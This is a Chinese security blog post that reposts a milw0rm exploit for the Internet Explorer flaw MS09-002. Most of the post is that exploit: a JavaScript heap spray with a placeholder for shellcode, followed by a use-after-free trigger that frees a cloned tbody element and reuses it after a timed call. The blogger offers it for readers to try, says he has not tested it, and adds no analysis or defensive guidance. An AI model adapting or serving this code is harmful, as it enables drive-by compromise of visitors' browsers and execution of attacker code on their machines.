游侠安全网--张百川(网路游侠)的博客

张百川(网路游侠,www.youxia.org)专注:网络安全、系统安全、应用安全、数据库安全、运维安全.

导航

« Imperva新推网页应用防火墙 中小企业Web安全防护 微软MS09-002漏洞攻击代码惊现互联网 »

最新:MS09-002 0day测试代码

  游侠没有测试过,大家自己玩吧……呵呵。

  MS09-002 0day
  <!--
  MS09-002
  ===============================
  grabbed from:
  wget http://www.youxia.org/default.html --user-agent="MSIE 7.0; Windows NT 5.1"
  took a little but found it. /str0ke
  -->
  <script language="JavaScript">
  var c="putyourshizhere-unescaped";
  var array = new Array();
  var ls = 0x100000-(c.length*2+0x01020);
  var b = unescape("%u0C0C%u0C0C");
  while(b.length<ls/2) { b+=b;}
  var lh = b.substring(0,ls/2);
  delete b;
  for(i=0; i<0xC0; i++) {
  array[i] = lh + c;
  }
  CollectGarbage();
  var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
  var a1 = new Array();
  for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
  function ok() {
  o1=document.createElement("tbody");
  o1.click;
  var o2 = o1.cloneNode();
  o1.clearAttributes();
  o1=null; CollectGarbage();
  for(var x=0;x<a1.length;x++) a1[x].src=s1;
  o2.click;
  }
  </script><script>window.setTimeout("ok();",800);</script>
  # milw0rm.com [2009-02-18]

  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Tags

站内搜索-Search

  • 找不到需要的?搜下试试!

日历

最近发表

产品推广

  • 广告位招租,有意者联系:
  • 张先生 电话:15339230081
  • QQ:175589438、55984512

最新评论及回复

Powered By Z-Blog 1.8 Walle Build 91204 Using ThinkTwice Theme Designed By Sino Blog

Auto Publisher Copyright 2005-2011 Www.YouXia.Org . 陕ICP备05000100号